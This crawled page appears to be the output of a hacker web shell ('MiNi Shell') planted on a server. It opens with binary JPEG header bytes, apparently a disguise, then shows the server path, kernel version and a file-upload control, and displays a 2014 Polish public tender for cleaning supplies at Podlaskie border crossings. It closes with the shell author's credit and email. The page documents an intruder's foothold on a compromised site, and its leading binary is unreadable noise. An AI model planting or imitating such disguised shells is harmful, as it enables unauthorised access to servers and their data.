JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140226/66372-N-2014.html

<p class="kh_header"><b>Białystok: Dostawa środków czystości, środków higienicznych 
i drobnych artykułów gospodarczych na potrzeby przejść granicznych województwa podlaskiego</b><br>
<b>Numer ogłoszenia: 66372 - 2014; data zamieszczenia: 26.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewoda Podlaski , ul. Mickiewicza 3, 15-213 Białystok, woj. podlaskie, tel. 85 7439387, faks 85 7439254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.uw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków czystości, środków higienicznych 
i drobnych artykułów gospodarczych na potrzeby przejść granicznych województwa podlaskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby przejść granicznych województwa podlaskiego.
2. Przedmiot zamówienia podzielony jest na sześć zadań:
1) Zadanie nr 1 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Kuźnicy Białostockiej, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Kuźnicy Białostockiej;
2) Zadanie nr 2 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Bobrownikach, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Bobrownikach;
3) Zadanie nr 3 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Białowieży, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Białowieży;
4) Zadanie Nr 4 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby drogowego przejścia granicznego w Połowcach, określonych w załączniku nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Połowcach;
5) Zadanie Nr 5 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby kolejowego przejścia granicznego w Siemianówce, określonych w załączniku nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Kolejowego Przejścia Granicznego w Siemianówce;
6) Zadanie Nr 6 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby rzecznego przejścia granicznego w Rudawce, określonych w załączniku nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Rzecznego Przejścia Granicznego w Rudawce. 
3. Ilości wskazane w załączniku nr 6 do SIWZ są wielkościami ostatecznymi i nie ulegną zmianie. Zamawiający nie przewiduje   możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 ustawy.
4. Szczegółowy opis przedmiotu zamówienia zawiera formularz cenowy stanowiący załącznik nr 6 do SIWZ.
5. Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedno, kilka lub na wszystkie zadania. Nie dopuszcza się dzielenia zadań.
6. Oferowane produkty muszą być dopuszczone do obrotu na rynek polski. Na każdym opakowaniu jednostkowym produktu musi znajdować się termin ważności (data przydatności do użycia) oraz instrukcja użytkowania w języku polskim. Zamawiający wymaga, aby okres ważności produktu (przydatności do użycia) wynosił minimum 12 miesięcy, licząc od daty dostawy do Zamawiającego. Produkty należy dostarczyć w nienaruszonych opakowaniach.
7. Wskazanie w opisie przedmiotu zamówienia nazwy lub producenta ma na celu określenie klasy produktu, jego jakości oraz służy ustaleniu standardu produktu. Wszędzie tam, gdzie w opisie przedmiotu zamówienia zawartym w niniejszej specyfikacji występują opisane powyżej określenia, Zamawiający dopuszcza produkty równoważne.
8. Zamawiający przez produkty równoważne rozumie produkty innego producenta, niż wykazany w opisie przedmiotu zamówienia, z zastrzeżeniem, że oferowane produkty muszą być nie gorszej jakości. Poprzez jakość Zamawiający rozumie zachowanie parametrów chemicznych, tzn. artykuły równoważne muszą posiadać tą samą substancję czynną o tym samym stężeniu, co produkty wymienione w opisie przedmiotu zamówienia.
9. Wykonawcy, którzy zaoferują równoważne produkty do opisanych w specyfikacji, zobowiązani są w myśl art. 30 ust. 5 ustawy wykazać, opisując produkt równoważny w kolumnie nr 5 załącznika nr 6 do SIWZ, że oferowane przez nich produkty spełniają wymagania określone przez Zamawiającego. 
10. Termin i sposób realizacji zamówienia:
1) nie więcej niż dwie dostawy w okresie od dnia zawarcia umowy do 31.12.2014 r. w terminach i ilościach określonych przez Zamawiającego; przewiduje się, że pierwsza dostawa nastąpi w marcu, zaś druga dostawa w sierpniu 2014 roku;
2) czas realizacji dostawy - do 7 dni roboczych od momentu przesłania zamówienia faksem, w dni robocze, w godzinach pracy Oddziałów Obsługi Przejść Granicznych 7:30 - 14:30.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 18.42.43.00-0, 33.76.10.00-2, 39.22.43.10-4, 39.22.42.00-0, 39.22.43.30-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) oświadczenie Wykonawcy potwierdzające, że oferowane produkty są dopuszczone do obrotu na terytorium Rzeczypospolitej Polskiej,
b) kopię aktualnej karty charakterystyki lub karty produktu sporządzone przez producenta oferowanego środka czystości. Produkty, do których należy załączyć karty, są wyszczególnione w załączniku nr 6 do SIWZ</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bialystok.uw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oddział ds Zamówień Publicznych Biura Organizacji i Kadr Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul. Mickiewicza 3, 15-213 Białystok, pokój nr 50..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2014 godzina 10:00, miejsce: sekretariat Biura Organizacji i Kadr Podlaskiego Urzędu Wojewódzkiego w
Białymstoku, ul.Mickiewicza3, 15-213 Białystok, pokój nr 49 (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> OSOBY UPOWAŻNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI
Joanna Pietrzak - starszy inspektor w Oddziale ds. Zamówień Publicznych Biura Organizacji i Kadr Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul. Mickiewicza 3, pokój nr 50, tel. 85 74 39 293, faks: 85 74 39 254, w godz. 9.00 - 15.00, e-mail: jpietrzak@bialystok.uw.gov.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Kuźnicy Białostockiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Kuźnicy Białostockiej, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Kuźnicy Białostockiej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 18.42.43.00-0, 33.76.10.00-2, 39.22.43.10-4, 39.22.42.00-0, 39.22.43.30-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Bobrownikach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Bobrownikach, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Bobrownikach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 18.42.43.00-0, 33.76.10.00-2, 39.22.43.10-4, 39.22.42.00-0, 39.22.43.30-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Białowieży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Białowieży, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Białowieży.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 33.76.10.00-2, 39.22.42.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby drogowego przejścia granicznego w Połowcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 4 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby drogowego przejścia granicznego w Połowcach, określonych w załączniku nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Połowcach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 33.76.10.00-2, 39.22.43.10-4, 39.22.42.00-0, 39.22.43.30-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby kolejowego przejścia granicznego w Siemianówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 5 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby kolejowego przejścia granicznego w Siemianówce, określonych w załączniku nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Kolejowego Przejścia Granicznego w Siemianówce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 33.76.10.00-2, 39.22.42.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby rzecznego przejścia granicznego w Rudawce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 6 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby rzecznego przejścia granicznego w Rudawce, określonych w załączniku nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Rzecznego Przejścia Granicznego w Rudawce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.42.43.00-0, 33.76.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com